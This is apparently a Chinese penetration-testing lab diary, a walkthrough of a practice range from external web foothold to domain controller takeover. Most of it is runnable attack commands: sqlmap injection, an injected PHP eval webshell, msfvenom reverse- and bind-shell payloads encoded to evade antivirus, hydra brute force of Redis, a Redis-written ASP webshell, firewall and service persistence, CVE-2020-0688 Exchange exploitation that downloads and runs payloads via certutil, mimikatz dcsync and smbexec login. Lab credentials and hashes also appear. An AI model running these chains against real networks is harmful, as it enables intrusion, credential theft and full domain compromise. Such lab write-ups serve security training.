打靶日记(七)从外网打点到内网域实战

项目十一 从外网打点到内网域实战

声明:此系列文章系个人记录打靶过程的文章,靶场为暗月师傅的靶场。这是第七篇。

1.项目说明

项目十一是从外网打点到内网再到域控,是三层网络,目标是反向代理 到内网访问,通过这个 WEB 点的信息获取码,再到审计突破,再到内网。到了内网通过横向移动发现更多主机,通过信息整理得到工作组边界设备的权限, 再通过 exchange 漏洞获取核心区域访问权限,再拿下域控权限。

image

主要技术应用: 基础的 php 代码审计、win 系统的宝塔系统提权、cs 或者 msf 实战渗透环境(vps 一台)、shellcode 免杀过火绒、内网漫游、三层网络、redis windows 写 shell windwos 防火墙配置 (主要是会开端口和端口转发)、代理隧道应用,exchange 漏洞命令执行,打域控技巧。

声明:此系列文章系个人记录打靶过程的文章,靶场为暗月师傅的靶场。这是第一篇。

2.环境搭建

BT开启frp映射(客户端的80端口映射到外面的80端口;即类似于反向代理)

image

服务端配置

image

修改vps的host

访问域名

1
http://www.cocat.cc

image

3.外网打点

3.1SQLMAP注入得到账号密码

在登录框处尝试SQL注入

1
admin'or 1=1#

image

发现报错了

image

拿到代码之后就行代码审计,发现了注入点: /kss_inc/payapi_return2.php

image

根据提示慢慢补充整个请求

image

开始尝试注入,把数据包保存下来放到SQL里面跑,被检测出来是MySQL数据库

1
sqlmap.py -r 2.txt

image

查找数据库

1
sqlmap.py -r 2.txt -dbms mysql -v 1 -p v_oid --dbs

image

查询表格

1
sqlmap.py -r 2.txt -dbms mysql -v 1 -p v_oid -D www_cocat_cc --tables

image

查询kss_tb_manager表格的字段

1
sqlmap.py -r 2.txt -dbms mysql -v 1 -p v_oid -D www_cocat_cc -T kss_tb_manager --columns

image

查询username和password字段的内容

1
sqlmap.py -r 2.txt -dbms mysql -v 1 -p v_oid -D www_cocat_cc -T kss_tb_manager -C "username,password" --dump

image

1
2
8abaf0333e173522e9b55d10698d5244破解得:moon@123
moonsec_admin

3.2修改配置文件拿 webshell

登录成功,在系统设置的“发送邮箱”的地方注入:

1
');eval($_POST['cmd']);//);

image

刷新之后变成了

image

尝试连接,连接成功

image

3.3提权宝塔系统

创建了一个phpinfo文件查看被禁用的函数。

禁用函数

1
passthru,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,pop epassthru,putenv,exec 

image

查看配置文件获取密码

image

宝塔的登录密码 C:/BtSoft/panel/data/default.pl jSKyFFdj

宝塔的登录端口 C:/BtSoft/panel/data/port.pl 8888

宝塔的登录网址路径 C:/BtSoft/panel/data/admin_path.pl /e1VOsmtO

image

C:/BtSoft/panel/data/default.db

image

sqlite 数据库打开即可

1
sqlitebrowser default.db

image

账号 gOXZQjWA 密码 jSKyFFdj 登录 http://localhost:8888/e1VOsmtO

 

扫描端口 nmap -sT -A 192.168.8.13

image

使用php去访问8888端口

1
2
3
<?php
echo file_get_contents('http://localhost:8888/e1VOsmtO')
?>

image

image

3.4frp 反向代理突破登录

当前站点是反向代理出去的,所以可以考虑能不能修改配置文件。

1
2
3
4
5
[8888]
type = tcp
local_ip = 127.0.0.1
local_port = 8888
remote_port = 8888

image

等待管理员重启之后就可以访问到宝塔的8888端口了

登录进入了宝塔后台,发现存在火绒,还有python的环境

image

4.内网渗透

4.1msf免杀马制作

生成攻击msf载荷

1
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.8.133 LPORT=6666 -b "\x00" -e x86/shikata_ga_nai -i 15 -f exe -o /root/moonsec/2020/project11/qq.exe

注:-i为编码的次数

经过免杀处理之后的文件,上传到目标上,使用计划任务执行

image

监听:

1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.8.133
set lport 6666
run

进程迁移

image

image

4.2主机信息收集

1
run hashdump

image

查看IP的信息

image

使用arp查看主机

1
run arp_scanner -r 192.168.88.0/24

image

image

4.4跨网段扫描

添加路由

1
run autoroute -s 192.168.88.0/24

image

开启代理

1
2
3
4
5
background
use auxiliary/server/socks_proxy
set srvhost 192.168.8.133
set srvport 3333
run

image

修改配置文件

1
vi /etc/proxychains.conf

image

代理 nmap 扫描

1
proxychains nmap -sT -Pn 192.168.88.1-4 192.168.88.255 192.168.88.254 -p 80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,6379,7001,7002,9200,9300,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389

image

查看信任主机

image

image

image

4.5hydra爆破redis

发现开启了redis端口的6379

九头蛇爆破redis获取到密码

1
proxychains hydra -P somd5top10w.txt -o passwd.txt redis://192.168.88.4 -vV -t 10 -f

image

image

查看80端口的服务

image

4.6redis服务器写webshell

在redis服务器写webshell

1
2
3
4
5
6
7
proxychains redis-cli -h 192.168.88.4
auth 123456789qq
config set dir c:/inetpub/wwwroot
set xxx "\n\n\n<%eval request(\"cmd\")%>\n\n\n"
config set dbfilename shell.asp
save
quit

image

尝试访问

image

4.7Antsword连接shell

使用中国蚁剑设置代理之后进行连接

image

4.8信息收集 redis 服务器信息

查看当前权限,发现权限比较低,我们可以尝试提权

image

4.9 PrintSpoofer 提权 server2012

上传提权工具printspoofer到目标,提权成功

image

4.10 下载 metasploist 正向后门收集信息

因为 reids 主机是出不了网的 所以要将后门放在宝塔上的 80 端口,同样也要过火绒。

使用msf生成一个正向连接的木马,上传至目标机器

1
msfvenom -p windows/x64/meterpreter/bind_tcp lport=7799 -f exe >m.exe

image

image

4.11设置 windwos 防火墙开放7799

因为有防火墙拦截,所以先添加一个7799的端口

1
garck.exe -i -c "netsh firewall add portopening tcp 7799 msf"

image

4.12 设置服务方式启动后门

注意双引号转义

1
2
3
4
moonsec.exe -i -c "sc create \"server power\" binpath= \"C:\ProgramData\8899.exe"" 
moonsec.exe -i -c "sc description \"server power\" \"description\""
moonsec.exe -i -c "sc config \"server power\" start= auto"
启动后门 moonsec.exe -i -c "net start \"server power\""

在目标运行木马

1
garck.exe -i -c "c:\gongju\m.exe"

image

开启监听

1
2
3
4
5
6
background
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.88.4
set lport 7799
run

image

看到了其它网段的IP:10.10.10.202

image

进行arp扫描这个网段,总是扫描断开,我们添加路由使用nmap去扫描

1
run arp_scanner -r 10.10.10.0/24

image

添加路由

1
run autoroute -s 10.10.10.0/24

image

根据80端口去探测存活的主机

1
proxychains nmap -sT -Pn 10.10.10.0/24 -p 80

image

1
proxychains nmap -sT -Pn 10.10.10.209 10.10.10.201 -p 53,443,80,445,135

image

image

发现了exchang服务

image

4.13. outlook 查看邮件

搜索文件pst

image

下载到本地

安装相关软件之后,进行查看邮件的内容

image

image

5.跨网段渗透

登录成功,查看所有的用户

image

 

复制之前生成的正向连接木马到web目录

1
copy "C:\gongju\m.exe" "C:\inetpub\wwwroot"

image

5.1CVE-2020-0688 攻击 exchange

下载后门文件到 exchange

1
CVE-2020-0688_EXP.py -s https://10.10.10.209 -u cncat\moonsec -p QQqq5201314 -c "cmd /c certutil -urlcache -split -f http://10.10.10.202/4444.exe c:/4444.exe

image

1
CVE-2020-0688_EXP.py -s https://10.10.10.209 -u cncat\moonsec -p QQqq5201314 -c "cmd /c certutil -urlcache -split -f http://10.10.10.202/m.exe c:/m.exe"

image

打开7799防火墙

1
CVE-2020-0688_EXP.py -s https://10.10.10.209 -u cncat\moonsec -p QQqq5201314 -c "cmd /c netsh firewall add portopening tcp 7799 msf"

image

执行木马程序

1
CVE-2020-0688_EXP.py -s https://10.10.10.209 -u cncat\moonsec -p QQqq5201314 -c "cmd /c c:/m.exe"

image

成功上线

image

1
run enum_logged_on_users -l

image

查看域控

image

查看域控IP

1
ping 12server-dc.cncat.cc

image

查看工作组的信息

1
net config workstation

image

收集域用户

1
net user /domain

image

查看进程,把进程迁移到域管理员用户的进程中

image

查看权限:getuid

image

1
dir \\10.10.10.201\c$

image

5.2mimikatz读取密码

1
2
3
load mimikatz
dcsync cncat\administrator
dcsync cncat

image

1
2
dcsync_ntlm administrator
dcsync administrator

image

破解哈希值

1
Hash: 42e2656ec24331269f82160ff5962387

image

5.3通过 smbexec 登录域控制器

1
proxychains python3 smbexec.py cncat/administrator:QWEasd123@10.10.10.201

image

image